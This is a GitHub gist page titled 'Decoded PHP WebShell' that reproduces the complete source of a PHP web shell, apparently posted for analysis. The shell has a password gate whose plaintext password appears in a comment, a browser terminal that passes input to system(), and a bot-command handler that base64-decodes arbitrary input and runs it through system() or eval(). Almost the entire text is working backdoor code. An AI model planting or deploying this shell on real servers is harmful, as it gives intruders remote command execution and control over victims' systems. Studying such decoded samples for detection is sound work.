Skip to content

Instantly share code, notes, and snippets.

@idiom

idiom/common.php

Last active January 31, 2017 17:03
Show Gist options
  • Save idiom/d55034c321650b38788db52bb3c6afb6 to your computer and use it in GitHub Desktop.
Save idiom/d55034c321650b38788db52bb3c6afb6 to your computer and use it in GitHub Desktop.
Download ZIP
Decoded PHP WebShell
Raw
common.php
$auth = "f20d65463f1f5bf4d5d87528a5e2004f"; //Hash of bl4ckv01d
$url = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
function display_auth_form() {
global $url;
?>
<form action="<?php echo $url ?>" method="post">
<input type="password" id="pwd" name="pwd">
<input type="hidden" id="do_auth" name="do_auth">
<input type="submit">
</form>
<?php
}
function auth() {
global $auth;
if ((!isset($_COOKIE['auth'])) && (!isset($_POST['do_auth']))) {
display_auth_form();
die();
}
if (isset($_POST['do_auth'])) {
if (isset($_POST['pwd'])) {
if (md5($_POST['pwd'])===$auth) {
setcookie("auth",md5($_POST['pwd']));
return true;
} else {
display_auth_form();
die();
}
}
display_auth_form();
die();
}
if (isset($_COOKIE['auth']))
if ($_COOKIE['auth']===$auth) {
return true;
} else {
display_auth_form();
die();
}
}
function display_interface() {
global $url;
?>
<html>
<title><?php echo $_SERVER['HTTP_HOST']; ?></title>
<style>
#windowr {
font-size: 13px;
color:#00ff00;
border:2px solid #00a000;
width:800px; height:50px;
background: #000000;
padding-left:10px;
}
#cmd {
background: #2F2F2F;
color:#00ff00;
}
</style>
<script>
function logout() {
document.cookie="auth=1;";
window.location='<?php echo $url; ?>';
}
function ajaxCallback(txt) {
var windowr = document.getElementById('windowr');
windowr.value=windowr.value+txt+'\n';
windowr.scrollTop = windowr.scrollHeight;
var cmd = document.getElementById('cmd');
cmd.value='';
}
function callAjax(url,postdata){
//var body = encodeURIComponent(postdata);
//alert(postdata); return;
var xmlhttp;
xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && xmlhttp.status == 200){
ajaxCallback(xmlhttp.responseText);
}
}
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xmlhttp.send(postdata);
}
function handleEnter(o,e) {
if (e.keyCode == 13) {
var cmd = document.getElementById('cmd');
var windowr = document.getElementById('windowr');
windowr.value=windowr.value+'\n$ '+cmd.value+'\n';
callAjax('<?php echo $url; ?>','action=cmd&cmd='+encodeURIComponent(cmd.value));
return false;
}
}
</script>
<body style="background: #000;">
<table width="100%" border="0" style="background: #000; color: #0f0;">
<tr width="100%">
<td width="100%">
<center>
<input type="text" id="cmd" name="cmd" style="width: 800px;" onkeydown="javascript:handleEnter(this,event);">
</center>
</td>
</tr>
<tr width="100%">
<td width="100%">
<center>
<textarea id="windowr" name="windowr" style="width: 800px; height: 800px;"></textarea>
</center>
</td>
</tr>
<tr><td><center><a href="#" onclick="javascript: logout();">exit</a></center></td></tr>
</table>
</body>
</html>
<?php
}
function handle_cmd() {
system($_POST['cmd']." 2>&1");
}
function handle_bot_cmd() {
if (isset($_POST['cmd']))
switch($_POST['cmd']) {
case 'code':
handle_bot_cmd_code();
break;
case 'shell':
handle_bot_cmd_shell();
break;
default:
break;
}
}
function handle_bot_cmd_shell() {
ob_start();
system(base64_decode($_POST['arg']));
$r=ob_get_clean();
print $r;
}
function handle_bot_cmd_code() {
ob_start();
eval(base64_decode($_POST['arg']));
$r=ob_get_clean();
print $r;
}
function logout() {
global $url;
setcookie("auth","1");
print "<script>window.location='".$url."';</script>";
die();
}
auth();
if (!isset($_POST['action']))
display_interface();
if (isset($_POST['action']))
switch ($_POST['action']) {
case 'cmd':
handle_cmd();
break;
case 'botcmd':
handle_bot_cmd();
break;
case 'logout':
logout();
break;
default:
return;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment